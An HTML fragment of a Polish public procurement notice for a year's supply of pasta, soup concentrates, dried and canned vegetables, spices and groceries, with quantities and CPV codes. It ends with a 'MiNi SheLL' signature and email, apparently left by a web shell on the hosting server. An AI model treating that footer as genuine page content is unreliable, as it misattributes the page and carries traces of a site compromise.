<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.21.00-1, 15.61.30.00-8, 15.61.41.00-6, 15.61.33.80-5, 15.61.33.11-1, 15.82.11.50-5, 15.61.40.00-5, 15.61.31.00-9, 15.61.10.00-4, 15.61.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Makarony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Makaron bezjajeczny nitki - gramatura jednostkowa min. od 5 do 15kg, zg. z PN. kl/gat. I, kg 1.200
2.Makaron bezjajeczny świder - mały  - gramatura jednostkowa min. od 5do 15 kg, zg. z PN. kl/gat. I,  kg 4.700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zupy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rosół wołowy - koncentrat,baza, wydajność min.40l z 1 kg, gramatura jednostkowa od 1do 2 kg, zg. z PN. kl/gat. I, kg 365
2.Rosół drobiowy -koncentrat,baza, wydajność min.40l z 1 kg, gramatura jednostkowa od 1do 2 kg, zg. z PN. kl/gat. I,  kg 400
3.Żurek w proszku - koncentrat, baza. Półprodukt do sporządzenia żurku, wydajność min.16,50l z 1 kg -gramatura jednostkowa od 0,5kg do  2kg, zg. z PN. kl/gat. I,  kg 400               
4.Zupa szparagowa - koncentrat, baza, wydajność min.10 l z 1 kg- gramatura jednostkowa od 0,5kg do 2 kg, zg. z PN. kl/gat. I,  kg 100  
5.Zupa kalafiorowa - koncentrat, baza, wydajność min.10 l z 1 kg- gramatura jednostkowa od 0,5kg do 2 kg, zg. z PN. kl/gat. I,  kg 100        
6.Zupa bieszczadzka - koncentrat, baza, wydajność min.10 l z 1 kg- gramatura jednostkowa od 0,5kg do 2kg, zg. z PN. kl/gat. I, kg 100
7.Zupa brokułowa - koncentrat, baza, wydajność min.10 l z 1 kg- gramatura jednostkowa od 0,5kg do 2 kg, zg. z PN. kl/gat. I, kg 100
8.Zupa pieczarkowa - koncentrat, baza, wydajność min.10 l z 1 kg- gramatura jednostkowa od 0,5kg do 2 kg, zg. z PN. kl/gat. I,  kg 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.15.00-5, 15.89.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Warzywa suszone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Włoszczyzna suszona - kostka min. 5 warzyw w składzie - gramatura jednostkowa od 0,50 do 15 kg, zg. z PN. kl/gat. I,  kg 150
2. Marchew suszona -  kostka- gramatura jednostkowa od  5 do 15 kg, zg. z PN. kl/gat. I, kg 100
3. Burak czerwony suszony - kostka  - gramatura jednostkowa od  5  do 15 kg, zg. z PN. kl/gat. I,  kg 50
4. Natka pietruszki suszona - gramatura jednostkowa od  5 do 15 kg, zg. z PN. kl/gat. I, kg 50
5 Koper suszony - mielony - gramatura jednostkowa od  5 do 15 kg, zg. z PN. kl/gat. I, kg 20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Fasolka konserwowa szparagowa  - gramatura jednostkowa od  0,35 do 4 kg, zg. z PN. kl/gat. I, kg 500
2.Groszek konserwowy  - gramatura jednostkowa od  0,35 do 4 kg, zg. z PN. kl/gat. I,  kg 450
3.Kukurydza konserwowa  - gramatura jednostkowa od  0,35 do 4 kg, zg. z PN. kl/gat. I,  kg 450
4.Papryka konserwowa- ćwiartki lub paski  - gramatura jednostkowa od  0,35 do 4 kg, zg. z PN. kl/gat. I,kg 650
5.Sałatka szwedzka  - gramatura jednostkowa od  0,90 do 4 kg, zg. z PN. kl/gat. I,  kg 600
6.Sałatka wielowarzywna min 3 składnikowa, (dodatek do  II -go dania) - gramatura jednostkowa od  0,90 do 4 kg, zg. z PN. kl/gat. I,  kg 600
7.Chrzan tarty  - gramatura jednostkowa od  0,25 do 0,90 kg, zg. z PN. kl/gat. I,  kg 300
8.Ogórki konserwowe - gramatura jednostkowa od  0,90 do 4 kg, zg. z PN. kl/gat. I, kg 1.800
9.Pasztet sojowy -  gramatura jednostkowa od 0,09 do 0,113 kg, zg. z PN. kl/gat. I,  kg 7,
10.Pasztet sojowy z koperkiem- gramatura jednostkowa od 0,09 do 0,113 kg, zg.zPN. kl/gat. I, kg 7, 
11.Pasztet sojowy z papryką- gramatura jednostkowa od 0,09 do 0,113 kg,zg. z PN. kl/gat. I,kg 7,
12.Pasztet sojowy z pomidorem-gramatura jednostkowa od 0,09 do 0,113 kg, zg.z PN.kl/gat.I, kg 7,
13.Pasztet sojowy z pieczarkami-gramatura jednostkowa od 0,09 do 0,113 kg,zg.zPN. kl/gat. I,kg 7,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.14.63-0, 15.33.14.62-0, 15.33.14.00-1, 15.33.11.36-9, 15.33.10.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Bazylia suszona mielona -  gramatura jednostkowa od  0,10 do 1 kg, zg. z PN. kl/gat. I,  kg 20
2.Czosnek granulowany - gramatura jednostkowa od  0,50 do 2 kg, zg. z PN. kl/gat. I,  kg 45
3.Oregano suszone mielone - gramatura jednostkowa od  0,10 do 1 kg, zg. z PN. kl/gat. I,  kg 10
4.Pieprz czarny prawdziwy, mielony - gramatura jednostkowa od 0,50 do do 2 kg, zg. z PN. kl/gat. I, kg 180
5.Ziele angielskie -  gramatura jednostkowa  od 0,50 do 2 kg, zg. z PN. kl/gat. I,, kg 20
6.Liść laurowy -  gramatura jednostkowa od 0,50 do 2 kg, zg. z PN. kl/gat. I,kg 20
7.Majeranek -  gramatura jednostkowa od 0,50 do 2 kg, zg. z PN. kl/gat. I, kg 50
8.Papryka czerwona, słodka, przyprawa - gramatura jednostkowa od 0,50 do 2 kg, zg. z PN. kl/gat.I,  kg 20 
9.Przyprawa do bigosu -  gramatura jednostkowa od 0,50 do 2 kg, zg. z PN. kl/gat. I, kg 10
10.Przyprawa do drobiu -  gramatura jednostkowa od 0,50 do 2 kg, zg. z PN. kl/gat. I, kg 20
11.Przyprawa do fasoli -  gramatura jednostkowa  od 0,50 do 1 kg, zg. z PN. kl/gat. I, kg 10
12.Przyprawa do gulaszu -  gramatura jednostkowa od 0,50 do 2 kg, zg. z PN. kl/gat.I, kg 20 
13.Przyprawa do mięsa mielonego -gramatura jednostkowa od 0,50 do 2 kg,zg. z PN. kl/gat.I,kg 20
14.Przyprawa do ryb -  gramatura jednostkowa  od 0,50 do 2 kg, zg. z PN. kl/gat. I, kg 4
15.Przyprawa do zup w płynie- gramatura jednostkowa 1 kg, zg. z PN. kl/gat. I,  kg 1.000
16.Przyprawa warzywna do zup i potraw - w proszku/sypka/ - gramatura jednostkowa od 3 do 5 kg, zg. z PN. kl/gat. I, kg 480
17.Sól spożywcza jodowana, warzona- gramatura jednostkowa 1 kg, zg. z PN. kl/gat. I, kg 720
18.Ocet spirytusowy 10% - gramatura jednostkowa  od 0,5 do  1 l, zg. z PN. kl/gat. I, l  360.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.12.70-7, 15.87.00.00-7, 15.87.21.00-2, 15.87.20.00-1, 15.87.24.00-5, 15.87.11.10-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Różne artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Herbata czarna granulowana - gramatura jednostkowa od 0,50 do 15 kg, opakowanie papierowe, zg. z PN. kl/gat. I, kg 360
2.Musztarda - gramatura jednostkowa od 0,5 do  5 kg, zg. z PN. kl/gat. I,  kg 1.000
3.Ketchup - gramatura jednostkowa od 0,50 do 5 kg, zg. z PN. kl/gat. I, kg 1.000
4.Dżem wioloowocowy/różne smaki/- gramatura jednostkowa od 0,30 do 15 kg, zg. z PN. kl/gat. I, kg 1.500 
5.Marmolada wioloowocowa/różne smaki/- gramatura jednostkowa od 0,30 do 15 kg, zg. z PN. kl/gat. I,  kg 1.700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.86.32.00-0, 15.87.12.50-1, 15.87.12.30-5, 15.33.22.90-3, 15.33.22.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com